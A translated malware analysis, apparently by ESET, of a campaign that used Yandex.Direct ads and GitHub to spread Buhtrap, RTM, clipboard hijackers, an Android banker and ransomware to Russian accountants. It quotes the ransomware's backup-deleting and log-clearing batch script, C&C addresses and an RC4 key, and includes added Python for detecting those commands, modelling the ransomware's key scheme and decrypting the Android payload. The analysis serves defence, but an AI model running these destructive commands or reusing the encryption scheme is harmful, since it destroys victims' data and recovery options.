Backdoor and Buhtrap encryptor distributed via Yandex.Direct

To target accountants in a cyberattack, the work documents they search for online can be used as bait. This is roughly what one cyber group has been doing over the past few months, distributing the known backdoors Buhtrap and RTM, as well as encryptors and software for stealing cryptocurrencies. Most of the targets are located in Russia. The attack was carried out by placing malicious advertisements on Yandex.Direct. Victims were directed to a site where they were asked to download a malicious file disguised as a document template. Yandex removed the malicious advertisements after our notification.

Buhtrap's source code was leaked online some time ago, so anyone can use it. We have no information about the availability of the RTM code.

In this post we describe how the attackers distributed the malware using Yandex.Direct and hosted it on GitHub. The post concludes with a technical analysis of the malware.

[Figure: the blanki-shabloni24[.]ru site used to deliver the malicious files]

Buhtrap and RTM are back in business

Distribution mechanism and victims

The various payloads delivered to the victims share a common distribution mechanism. All malicious files created by the attackers were placed in two different GitHub repositories.

Usually a repository contained a single downloadable malicious file, which changed frequently. Since GitHub allows the change history of a repository to be viewed, we can see which malware was distributed at any given time. To convince the victim to download the malicious file, the website blanki-shabloni24[.]ru, shown in the figure above, was used.

The site design and all the names of the malicious files follow a single concept: forms, templates, contracts, samples, and so on. Considering that Buhtrap and RTM have already been used in attacks on accountants in the past, we assumed that the strategy in the new campaign is the same. The only question is how the victims got to the attackers' site.

Infection

At least several of the victims who ended up on this site were brought there by malicious advertising. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As can be seen from the link, the banner was placed on the legitimate accounting forum bb.f2[.]kz. It is important to note that the banners appeared on various sites, all of them had the same campaign id (blanki_rsya), and most of them related to accounting or legal services. The URL shows that the victim used the search query "download invoice form" (скачать бланк счета), which supports our hypothesis of a targeted attack. Below are the sites on which the banners appeared and the associated search queries.

  • download invoice form – bb.f2[.]kz
  • sample contract – Ipopen[.]ru
  • complaint application template – 77metrov[.]ru
  • contract form – blank-dogovor-kupli-prodazhi[.]ru
  • lawsuit template – zen.yandex[.]ru
  • sample complaint – yurday[.]ru
  • sample contract form – Regforum[.]ru
  • contract form – assistentus[.]ru
  • sample agreement – napravah[.]com
  • legal contract templates – avito[.]ru

The blanki-shabloni24[.]ru site was probably set up to pass a superficial review. Typically, an advertisement pointing to a professional-looking site that links to GitHub does not look like anything bad. In addition, the attackers uploaded the malicious files to the repository only for limited periods, presumably during the campaign. Most of the time the GitHub repository contained only empty files. Thus, the attackers could distribute advertisements through Yandex.Direct on sites that would most likely be visited by accountants who arrived in response to specific search queries.

Next, let us look at the various payloads distributed in this way.

Payload Analysis

Chronology of distribution

The malicious campaign began at the end of October 2018 and was still active at the time of writing. Since the whole repository was publicly available on GitHub, we were able to compile an accurate timeline of the distribution of the different malware families (see the figure below). We added a line showing when the banner link was seen, as measured by ESET telemetry, for comparison with the git history. As can be seen, this correlates well with the availability of payloads on GitHub. The discrepancy at the end of February can be explained by the fact that we are missing part of the change history, because the repository was removed from GitHub before we could obtain it in full.

[Figure 1. Chronology of malware distribution.]

Code-signing certificates

The campaign used multiple certificates. Some of them signed more than one malware family, which further indicates that the different samples belong to the same campaign. Despite possessing the private keys, the operators did not systematically sign their binaries and did not use the keys for all samples. At the end of February 2019, the attackers began producing invalid signatures using a Google certificate for which they did not have the private key.

All the certificates involved in the campaign and the malware families they signed are listed in the table below.

[Table image: certificates used in the campaign and the malware families they signed]

We also used these code-signing certificates to establish connections with other malware families. For most of the certificates we found no samples that were not distributed through the GitHub repository. However, the certificate TOV "MARIYA" was used to sign malware belonging to the Wauchos botnet, adware and miners. It is unlikely that this malware is related to this campaign; most likely the certificate was bought on the dark web.

Win32/Filecoder.Buhtrap

The first component that caught our attention was the newly discovered Win32/Filecoder.Buhtrap. It is a Delphi binary that is sometimes packed. It was distributed mainly in February-March 2019. It behaves as a ransomware program should: it searches local drives and network shares and encrypts the files it finds. It does not need an Internet connection to do its damage, because it does not contact a server to send the encryption keys. Instead, it appends a "token" to the end of the ransom note and tells the victim to contact the operators by email or Bitmessage.

To encrypt as many sensitive resources as possible, Filecoder.Buhtrap runs a thread designed to close key software that may hold open handles on files containing valuable data, since those handles could interfere with encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to make data recovery harder. To do this, it runs the batch script below.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
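The script above is also a compact detection opportunity. None of these commands is exotic on its own, but several of them appearing in a short window from one process tree is a strong ransomware signal (shadow copies and backup catalog deleted, recovery disabled, event logs cleared, the event log service disabled). The following Python is an added example, not code from the original post or from ESET: it runs a few regex rules over constructed process-creation log lines and counts how many distinct recovery-inhibition techniques appear. The log format ("pid | image | command line"), the sample lines and the rule names are all constructed for this example.

```python
import re

# Constructed process-creation events, "pid | image | command line" (not real telemetry).
SAMPLE_EVENTS = [
    "1208 | C:\\Windows\\System32\\cmd.exe | cmd.exe /c vssadmin delete shadows /all /quiet",
    "1212 | C:\\Windows\\System32\\wbem\\WMIC.exe | wmic shadowcopy delete",
    "1216 | C:\\Windows\\System32\\bcdedit.exe | bcdedit /set {default} recoveryenabled no",
    "1220 | C:\\Windows\\System32\\wevtutil.exe | wevtutil.exe clear-log Security",
    "1224 | C:\\Windows\\System32\\sc.exe | sc config eventlog start=disabled",
    "1230 | C:\\Windows\\System32\\wbadmin.exe | wbadmin get versions",    # benign admin query
    "1234 | C:\\Windows\\System32\\vssadmin.exe | vssadmin list shadows",  # benign
    "1240 | C:\\Windows\\System32\\bcdedit.exe | bcdedit /enum",           # benign
]

# One rule per technique seen in the script; names are constructed labels, not a vendor taxonomy.
RULES = [
    ("shadow_copy_deletion", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("shadow_copy_deletion", re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("backup_catalog_deletion",
     re.compile(r"\bwbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup|backup)\b", re.I)),
    ("recovery_disabled",
     re.compile(r"\bbcdedit(\.exe)?\s+/set\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("eventlog_cleared",
     re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\s+(application|security|system)\b", re.I)),
    ("eventlog_service_disabled",
     re.compile(r"\bsc(\.exe)?\s+config\s+eventlog\s+start=\s*disabled\b", re.I)),
    ("rdp_history_wiped",
     re.compile(r'\breg(\.exe)?\s+delete\s+"?HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client', re.I)),
]


def classify(cmdline):
    """Return the distinct rule names a single command line triggers, in rule order."""
    names = []
    for name, rx in RULES:
        if rx.search(cmdline) and name not in names:
            names.append(name)
    return names


def scan_events(lines):
    """Return [(pid, [rule names])] for every event that matches at least one rule."""
    hits = []
    for line in lines:
        pid, _image, cmdline = [part.strip() for part in line.split("|", 2)]
        names = classify(cmdline)
        if names:
            hits.append((int(pid), names))
    return hits


def inhibit_recovery_score(lines):
    """Number of distinct techniques seen; three or more in one window is worth an alert on its own."""
    seen = set()
    for _pid, names in scan_events(lines):
        seen.update(names)
    return len(seen)


if __name__ == "__main__":
    for pid, names in scan_events(SAMPLE_EVENTS):
        print(pid, names)
    print("distinct recovery-inhibition techniques:", inhibit_recovery_score(SAMPLE_EVENTS))
```

The benign lines (listing shadows, enumerating boot entries, querying backup versions) are deliberately included: the rules key on the destructive verbs, not on the tool names, which is what keeps such a rule usable on hosts where administrators run these utilities legitimately.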

Filecoder.Buhtrap uses the legitimate online service IP Logger, which is designed to collect information about website visitors. Here it is used to track ransomware victims, which is done with the following command line:

mshta.exe "javascript:document.write('');"

Files are selected for encryption if they do not match any of three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all files whose full path contains one of the directory strings from the list below are excluded.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
google\chrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel

Third, certain file names are also excluded from encryption, among them the file name of the ransom note itself. The list is given below. Obviously, all these exceptions are intended to keep the machine bootable, but only minimally usable.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

File encryption scheme

On execution, the malware generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hard-coded 2048-bit public key (public exponent and modulus), zlib-compressed and base64-encoded. The code responsible for this is shown in Figure 2.

[Figure 2. Hex-Rays decompilation of the 512-bit RSA key pair generation routine.]

Below is an example of the plaintext of a generated private key, which is the token appended to the ransom note.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

The attackers' public key is given below.

e = (value not preserved on this page)
n = (value not preserved on this page)

Files are encrypted using AES-128-CBC with a 256-bit key. A new key and a new initialization vector are generated for every encrypted file. The key information is appended to the end of the encrypted file. Let us look at the format of an encrypted file.
Encrypted files have the following header:

[Figure: header of an encrypted file]

The file body, with the VEGA magic value added, is encrypted up to the first 0x5000 bytes. All the decryption information is appended to the file with the following structure:

[Figure: structure of the decryption information appended to the file]

- Small-file marker: a flag indicating whether the file is larger than 0x5000 bytes
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))
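To make the key hierarchy concrete, here is an added Python model of the scheme described in this section. It is example code written for this page, not the malware's code and not ESET's. It uses unpadded textbook RSA, as the text describes, a 512-bit per-victim key pair, a 2048-bit "operator" key pair, and the ZlibCompress(RSAEncrypt(...)) plus base64 layering for the token, and then walks the recovery path: only the holder of the 2048-bit private key can open the token, recover (d, n), and from there unwrap a per-file AES key and IV. The deterministic seed, the fixed 64-byte field widths for d and n, the 32-byte key plus 16-byte IV layout, and the hypothetical operator private key are assumptions made for the example; the AES encryption of the file body itself is not modelled.

```python
import base64
import random
import zlib

# Deterministic RNG so the worked example is reproducible; real key generation must use an OS CSPRNG.
rng = random.Random(2019)

SMALL_PRIMES = [p for p in range(3, 2000, 2)
                if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]


def is_probable_prime(n, rounds=16):
    """Trial division by small primes, then Miller-Rabin."""
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits):
    # Top two bits set so that p*q has exactly 2*bits bits.
    while True:
        candidate = rng.getrandbits(bits) | (3 << (bits - 2)) | 1
        if is_probable_prime(candidate):
            return candidate


def gen_rsa(bits, e=65537):
    """Return ((e, n), (d, n)) for a textbook RSA key with a modulus of the given size."""
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (e, p * q), (pow(e, -1, phi), p * q)


def rsa_raw(msg, key):
    """Unpadded RSA exactly as the scheme uses it: m^exp mod n, fixed-width big-endian output."""
    exp, n = key
    m = int.from_bytes(msg, "big")
    assert m < n, "raw RSA input must be smaller than the modulus"
    return pow(m, exp, n).to_bytes((n.bit_length() + 7) // 8, "big")


# --- victim side: what happens at run time ---------------------------------

def make_token(victim_priv, operator_pub):
    """RSA key blob = base64(zlib(RSAEncrypt(d || n, hard-coded 2048-bit public key))).
    The two 64-byte field widths are an assumption of this example."""
    d, n = victim_priv
    blob = d.to_bytes(64, "big") + n.to_bytes(64, "big")
    return base64.b64encode(zlib.compress(rsa_raw(blob, operator_pub))).decode()


def wrap_file_key(aes_key, iv, victim_pub):
    """AES key blob = zlib(RSAEncrypt(key || IV, generated 512-bit public key))."""
    return zlib.compress(rsa_raw(aes_key + iv, victim_pub))


# --- recovery side: only possible with the operators' private key -----------

def recover_victim_key(token, operator_priv):
    plain = rsa_raw(zlib.decompress(base64.b64decode(token)), operator_priv)[-128:]
    return int.from_bytes(plain[:64], "big"), int.from_bytes(plain[64:], "big")


def unwrap_file_key(blob, victim_priv):
    plain = rsa_raw(zlib.decompress(blob), victim_priv)[-48:]  # 32-byte key + 16-byte IV (assumed layout)
    return plain[:32], plain[32:]


def demo():
    operator_pub, operator_priv = gen_rsa(2048)  # public half is hard-coded in the binary (hypothetical pair)
    victim_pub, victim_priv = gen_rsa(512)       # generated per infection
    token = make_token(victim_priv, operator_pub)
    aes_key = bytes(rng.getrandbits(8) for _ in range(32))
    iv = bytes(rng.getrandbits(8) for _ in range(16))
    blob = wrap_file_key(aes_key, iv, victim_pub)
    # The 512-bit private key never leaves the machine in clear, so without operator_priv
    # the token is opaque and the per-file keys cannot be unwrapped.
    d, n = recover_victim_key(token, operator_priv)
    key2, iv2 = unwrap_file_key(blob, (d, n))
    return {"victim_key_recovered": (d, n) == victim_priv,
            "file_key_recovered": (key2, iv2) == (aes_key, iv)}


if __name__ == "__main__":
    print(demo())
```

The model shows why the sample needs no network access: everything the operators need to decrypt is carried in the token the victim is told to send them, and nothing an analyst can extract from the binary (it contains only the 2048-bit public key) is sufficient to reverse the chain.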

Win32/ClipBanker

Win32/ClipBanker is a component that was distributed intermittently from the end of October to the beginning of December 2018. Its role is to monitor the contents of the clipboard, looking for cryptocurrency wallet addresses. Having identified a target wallet address, ClipBanker replaces it with an address believed to belong to the operators. The samples we examined are neither packed nor obfuscated. The only mechanism used to mask its behaviour is string encryption; the operators' addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

During the period the malware was being distributed, only a small amount was sent to the attackers' Bitcoin wallets, which casts doubt on the success of the campaign. Moreover, there is no evidence that these transactions were related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed for a few days in early March 2019. RTM is a banking Trojan written in Delphi that targets remote banking systems. In 2017, ESET researchers published a detailed analysis of this program, and that description is still relevant. In January 2019, Palo Alto Networks also published a blog post about RTM.

Buhtrap Loader

For some time, a downloader that did not resemble the earlier Buhtrap tools was available on GitHub. It contacts https://94.100.18[.]67/RSS.php?<some_id> to obtain the next stage and loads it directly into memory. We can distinguish two behaviours of the second-stage code. In the first, RSS.php delivered the Buhtrap backdoor directly; this backdoor is very similar to the one that became available after the source code leak.

Interestingly, we see several campaigns using the Buhtrap backdoor, allegedly run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process that we discussed earlier. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server. In most of the campaigns we have seen, the operators did not bother to change this key.

The second, more complex behaviour was that the RSS.php URL handed over to another loader. That loader implements some obfuscation, such as rebuilding the dynamic import table. Its purpose is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we saw executed by this loader was the same Buhtrap backdoor, but there may be others.

Android/Spy.Banker

Interestingly, a component for Android was also found in the GitHub repository. It was in the master branch for only one day, November 1, 2018. Apart from its publication on GitHub, ESET telemetry found no evidence of this malware being distributed.

The component was hosted as an Android Application Package (APK). It is heavily obfuscated. The malicious behaviour is hidden in an encrypted JAR inside the APK. It is encrypted with RC4 using this key:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

The same key and algorithm are used to encrypt strings. The JAR is located at APK_ROOT + image/files. The first 4 bytes of the file contain the length of the encrypted JAR, which begins immediately after the length field.
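An analyst who wants to pull the JAR out of the APK needs only the container layout just described and the RC4 key above. The following Python is an added example, not ESET's tooling: it implements RC4, parses the 4-byte length prefix, decrypts the payload and checks for the ZIP "PK" signature before returning it, so that a wrong key or wrong byte order fails loudly instead of yielding garbage. The byte order of the length field is not stated in the analysis, so it is an assumption and is taken as a parameter. The sample container is constructed inside the block from a tiny in-memory ZIP; the key is the one listed above.

```python
import io
import zipfile

# RC4 key from the sample, as listed in the analysis above.
KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])


def rc4(key, data):
    """Plain RC4 (key scheduling + keystream XOR). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def extract_jar(container, key=KEY, byteorder="little"):
    """Parse '4-byte length || RC4(JAR)'. The byte order of the length is an assumption."""
    if len(container) < 4:
        raise ValueError("container too short for a length prefix")
    length = int.from_bytes(container[:4], byteorder)
    if length > len(container) - 4:
        raise ValueError(f"declared length {length} exceeds the {len(container) - 4} bytes available")
    jar = rc4(key, container[4:4 + length])
    if jar[:2] != b"PK":
        raise ValueError("decrypted data lacks the ZIP/JAR 'PK' signature: wrong key or byte order?")
    return jar


def decrypt_string(blob, key=KEY):
    """Strings in the sample use the same key and algorithm."""
    return rc4(key, blob).decode("utf-8", errors="replace")


# --- constructed fixture (not taken from the real APK) ---------------------

def sample_jar():
    """A minimal ZIP standing in for the JAR; fixed timestamp keeps the bytes reproducible."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        info = zipfile.ZipInfo("classes.dex", date_time=(2018, 11, 1, 0, 0, 0))
        info.compress_type = zipfile.ZIP_DEFLATED
        z.writestr(info, b"constructed placeholder, not a real dex file")
    return buf.getvalue()


def build_container(jar, key=KEY, byteorder="little", trailing=b"\x00" * 16):
    """Mirror the layout: length prefix, RC4 body, then whatever follows in the real file."""
    enc = rc4(key, jar)
    return len(enc).to_bytes(4, byteorder) + enc + trailing


def demo():
    container = build_container(sample_jar())
    jar = extract_jar(container)
    return {"container_len": len(container), "jar_len": len(jar),
            "entries": zipfile.ZipFile(io.BytesIO(jar)).namelist()}


if __name__ == "__main__":
    print(demo())
```

If the real file yields no "PK" signature with the little-endian reading, try `byteorder="big"` before suspecting the key; the length check also guards against a truncated dump, which is the other common reason an extraction fails.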

Having decrypted the file, we found that it was Anubis, a previously documented banker for Android. The malware has the following capabilities:

  • microphone recording
  • taking screenshots
  • obtaining GPS coordinates
  • keylogging
  • encrypting the device's data and demanding a ransom
  • sending spam

Interestingly, the banker uses Twitter as a backup communication channel to obtain another C&C server. The sample we analysed used the @JonesTrader account, but at the time of analysis it had already been blocked.

The banker contains a list of target applications on the Android device. It is longer than the list obtained in the Sophos study. The list includes many banking applications, online shopping applications such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign is a .NET Windows executable, which appeared in March 2019. Most of the versions studied were packed with ConfuserEx v1.0.0. Like ClipBanker, this component targets the clipboard. It aims at a wide range of cryptocurrencies, as well as trade offers on Steam. In addition, it uses the IP Logger service to steal private Bitcoin WIF keys.

Protection mechanisms
Besides the benefits ConfuserEx provides against debugging, dumping and tampering, the component includes the ability to detect antivirus products and virtual machines.

To check whether it is running in a virtual machine, the malware uses the Windows WMI command-line tool (WMIC) to request BIOS information, namely:

wmic bios

The program then parses the command output and looks for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center using the ManagementObjectSearcher API, as shown below. After base64 decoding, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

[Figure 3. Routine for detecting antivirus products.]

In addition, the malware checks whether CryptoClipWatcher, a tool for protecting against clipboard attacks, is running and, if so, suspends all threads in that process, thereby disabling the protection.

Persistence

The version of the malware we studied copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then modifies the value Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell in the Windows registry, adding the path to updater.exe. This way the malware is executed every time the user logs in.

Malicious behaviour

Like ClipBanker, the malware monitors the contents of the clipboard, looking for cryptocurrency wallet addresses, and when it finds one it replaces it with one of the operators' addresses. Below is the list of targeted address types as found in the code.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

Each address type has a corresponding regular expression. The STEAM_URL value is used to attack the Steam system, as can be seen from the regular expression used to recognise it in the clipboard:

\b(https://|http://|)steamcommunity\.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b

Exfiltration channel

In addition to replacing addresses in the clipboard, the malware targets the private WIF keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses iplogger.org as the exfiltration channel for the WIF private keys. To do this, the operators put the private key data into the User-Agent HTTP header, as shown below.

[Figure 4. IP Logger console with exfiltrated data.]

The operators did not use iplogger.org to exfiltrate wallet files. They probably resorted to a different method because of the 255-character limit on the User-Agent field as displayed in the IP Logger web interface. In the samples we studied, the other exfiltration server was stored in the DiscordWebHook environment variable. Surprisingly, this environment variable is not assigned anywhere in the code. This suggests that the malware is still under development and that the variable is set on the operator's test machine.

There is another sign that the program is under development. The binary includes two iplogger.org URLs, and both are queried when data is exfiltrated. In the request to one of these URLs, the value of the Referer field is prefixed with "DEV /". We also found a version that was not packed with ConfuserEx, in which the recipient of this URL is named DevFeedbackUrl. Based on the name of the environment variable, we believe the operators plan to use the legitimate Discord service and its webhook system to steal cryptocurrency wallets.

Conclusion

This campaign is an example of the use of legitimate advertising services in cyberattacks. It targets Russian organizations, but we would not be surprised to see such an attack using non-Russian services. To avoid compromise, users should be confident in the reputation of the source of the software they download.

A full list of indicators of compromise and MITRE ATT&CK techniques is available at the link.

Source: www.hab.com
